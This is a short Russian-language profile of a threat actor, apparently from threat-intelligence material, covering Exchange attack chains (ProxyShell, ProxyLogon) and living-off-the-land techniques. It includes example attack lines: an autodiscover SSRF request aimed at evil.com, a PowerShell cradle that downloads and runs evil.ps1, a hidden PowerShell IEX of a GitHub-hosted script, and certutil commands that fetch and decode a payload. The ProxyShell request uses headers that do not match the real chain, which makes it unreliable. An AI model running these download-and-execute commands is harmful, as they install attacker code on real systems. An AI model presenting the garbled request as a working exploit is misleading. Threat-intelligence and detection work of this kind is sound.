Известна использованием сложных цепочек эксплуатации, таких как атаки на Microsoft Exchange (ProxyShell, ProxyLogon). Также применяет методы скрытия через legitimate services (GitHub, Dropbox) и использование встроенного в систему кода (Living off the Land).
// Пример эксплуатации ProxyShell (SSRF -> Auth Bypass -> RCE) // 1. Получение токена администратора через SSRF POST /autodiscover/autodiscover.json?@evil.com/owa/ HTTP/1.1 X-Request-Failed-Fatal: 1 X-Barracuda-Original-Request-To: evil.com Content-Type: application/x-www-form-urlencoded // 2. Использование токена для выполнения команд // Загрузка вредоносного PowerShell-скрипта iex ((New-Object Net.WebClient).DownloadString('http://evil.com/evil.ps1'))
// Использование GitHub для хранения вредоносных скриптов (LOLBIN) // powershell -w hidden -c "IEX (iwr https://raw.githubusercontent.com/user/repo/main/evil.ps1).Content" // Использование certutil.exe для загрузки и декодирования // certutil.exe -urlcache -split -f http://evil.com/encoded_payload.b64 payload.b64 // certutil.exe -decode payload.b64 decoded_payload.bin